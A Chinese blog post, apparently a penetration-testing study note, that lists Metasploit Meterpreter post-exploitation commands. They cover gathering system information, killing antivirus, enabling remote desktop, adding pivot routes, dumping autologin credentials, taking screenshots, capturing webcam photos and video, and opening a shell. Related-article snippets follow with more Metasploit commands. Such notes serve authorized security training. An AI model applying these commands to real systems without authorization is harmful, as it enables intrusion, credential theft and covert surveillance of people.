37. Metasploit后渗透攻击:Meterpreter系统命令

最新推荐文章于 2024-05-03 11:14:06 发布
最新推荐文章于 2024-05-03 11:14:06 发布
阅读量2.8k 收藏 8
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44023693/article/details/104940544
版权
1.查看系统信息

命令: sysinfo
在这里插入图片描述

2.查看是否为虚拟机

命令:run post/windows/gather/checkvm
在这里插入图片描述

3.查看运行时间

命令:idletime
在这里插入图片描述

4.查看完整网络配置

命令:route
在这里插入图片描述

5.查看当前权限

命令:getuid
在这里插入图片描述

6.关闭杀毒软件

命令:run post/windows/manage/killav
在这里插入图片描述

7.启动远程桌面

命令:run post/windows/manage/enable_rdp
在这里插入图片描述

8.查看网络结构

命令:run post/windows/manage/autoroute
在这里插入图片描述

9.添加路由

先输入background命令,将当前Meterpreter终端隐藏在后台,然后route add 命令添加路由,添加路由后输入route print命令查看

10.列举当前登录的用户

命令: run post/windows/gather/enum_logged_on_users
在这里插入图片描述

11.列举应用程序

命令:run post/windows/gather/enum_applications
在这里插入图片描述

12.抓取自动登录的用户名和密码

命令:run post/windows/gather/credentials/windows_autologin
在这里插入图片描述

13.抓取目标机的屏幕截图

首选使用扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令就可以抓取此时目标机的屏幕截图
输入screenshot也可以达到同样的效果
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

14.查看目标机是否有摄像头

命令:webcam_list
在这里插入图片描述

15.抓取摄像头的照片

命令:webcam_snap

16.抓取视频

命令:webcam_stream
查看抓取的视频:使用浏览器打开给出的地址即可

17.进入目标机的shell

命令:shell
在这里插入图片描述

__Qian
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用metasploit对操作系统攻击
2201_76106464的博客
06-23 151
网络安全离不开操作系统,操作系统对网络安全有着非常重要的影响,许多网络攻击都是从寻找系统的缺陷入手的。在漏洞、攻击发生时,尽量避免使用发生漏洞的操作系统,或者根据漏洞补救方法对自己电脑的操作系统进行修复,尽量避免在漏洞未修复时登录个人隐私性账户;重要数据一定要定期做好备份,一天一备或一小时一备,最好做到异地备份,不要备份在同一台服务器上,万一数据被删除或被入侵挟持,备份在异地的数据能保证安全;除了重视被漏洞入侵的危害,还要防范恶意攻击,选择高防服务器。
metasploit常用命令
Johnathan的博客
03-03 536
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集1 ——基于TCP协议收集主机信息(主机信息、端口状态、密码嗅探)
最新发布
天下著书立传者,皆为我师
05-03 938
实验内网渗透环境Metasploitable2-linux:靶机 192.168.234.8kali-debian:攻击机 192.168.234.141win7 虚拟机:靶机 192.168.234.158在此声明文章仅供相互学习参考,严禁利用于违法犯忌的事,任何事故自行承担!!
Metasploit学习笔记(四)——Meterpreter渗透之信息搜集
Zichel77的博客
10-07 1216
此时就需要用到扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令,就可以抓取此时目标机的屏幕截图。在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有。所以第一步就是要移动这个Shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。利用前面永恒之蓝的步骤一模一样,就可以进到后渗透的步骤meterpreter,前面的详细步骤参考。
渗透阶段-meterpreter使用
weixin_39986112的博客
04-08 411
sessions -l 查看我们获得的shell session -i 1 即可切换到id为1的shell sysinfo 查看目标主机的信息 getwd 可以获取当前目标机器的工作目录,也可以获得当前系统的工作目录 route 可以查看路由 getproxy #查看代理信息 autoroute添加路由 run autoroute –h #查看帮助 ...
metasploit常用渗透命令.zip
09-16
Metasploit是一款强大的安全漏洞检测工具,主要用于网络安全测试和评估。它包含了大量的预构建的渗透测试模块,...对于初学者来说,阅读“metasploit常用渗透命令.pdf”文档将提供宝贵的指导,逐步掌握这个强大的工具。
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
MeterpreterMetasploit 框架中的一个高级交互式后渗透工具,它允许渗透测试者在成功利用漏洞后与目标系统进行深度交互,执行多种高级操作。在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它...
metasploit常用渗透命令[文].pdf
10-11
Metasploit是一款强大的安全测试工具,广泛用于渗透测试和漏洞利用。...以上是Metasploit渗透测试中的一些基本命令和概念,实际使用时需要根据具体情况灵活运用,并始终遵守合法的渗透测试准则,确保测试行为的合规性。
Metasploit渗透测试指南(全) .pdf
12-23
Meterpreter提供了一个交互式的shell,允许攻击者在目标系统上执行命令、窃取数据、记录键盘输入等。读者将学习如何充分利用Meterpreter进行深度渗透和横向移动。 社交工程工具也是Metasploit的一部分,这些工具...
网络攻击与防御-第四章 Metasploit渗透攻击.pptx
06-29
Metasploit渗透攻击详解】 Metasploit是一个广泛使用的开源渗透测试框架,它为安全研究人员和道德黑客提供了大量工具和资源,以便评估网络防御的有效性并发现潜在的安全漏洞。Metasploit Framework(MSF)的核心...
复习D第二阶段
weixin_58214724的博客
03-24 1973
目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定 的时间,该 Cookie 就会被系统清除 Cookie 是由 HTTP 服务器设置的,保存在浏览器中,但 HTTP 协议是一种无状态协议,在数据交换完毕后,服务 器端和客户端的链接就会关闭,每次交换数据都需要建立新的链接。 Cookie 的几种常见属性: key=value;expires=失效时间;path=路径;domain=域名;secure;(secure 表安全级别)
Meterpreter(后渗透命令)笔记
5L2g556F5ZWl77yf
02-17 1919
Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令Meterpreter命令详情 下面是一些常用的后渗透命令及实验。 基本命令: 基本命令包含Meterpreter与MSF终端,Ruby接口,目标Shell等交互命令。 background命令 如果想在MSF终端执行其他任务,可以使用backgruond命令将MSF终端隐藏在后台。 se...
12.6、后渗透测试--Windows系统下信息收集模块
无痕的博客
12-14 444
meterpreter渗透阶段,搜集windows信息
渗透测试-[Meterpreter渗透25招]
m0_43405474的博客
05-07 3237
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
metasploit(MSF)渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1934
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
Metasploit技术(五)——系统命令
Phantom03167的博客
04-20 3442
系统命令
3.Metasploit攻击流程及命令介绍
weixin_30265171的博客
07-03 394
Metasploit 进阶第一讲 攻击流程及命令介绍 01.渗透测试过程环节(PTES) 1.前期交互阶段:与客户组织进行交互讨论,确定范围,目标等 2.情报搜集阶段:获取更多目标组织信息,Nmap、Nessus等 3.威胁建模阶段:理清头绪,确定出最可行的攻击通道 4.漏洞分析阶段:搜索可获取的渗透代码资源 5.渗透攻击阶段:找出安全漏洞,入侵系统 6.后渗透攻击...
MSF后渗透操作
weixin_51583379的博客
11-03 1523
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值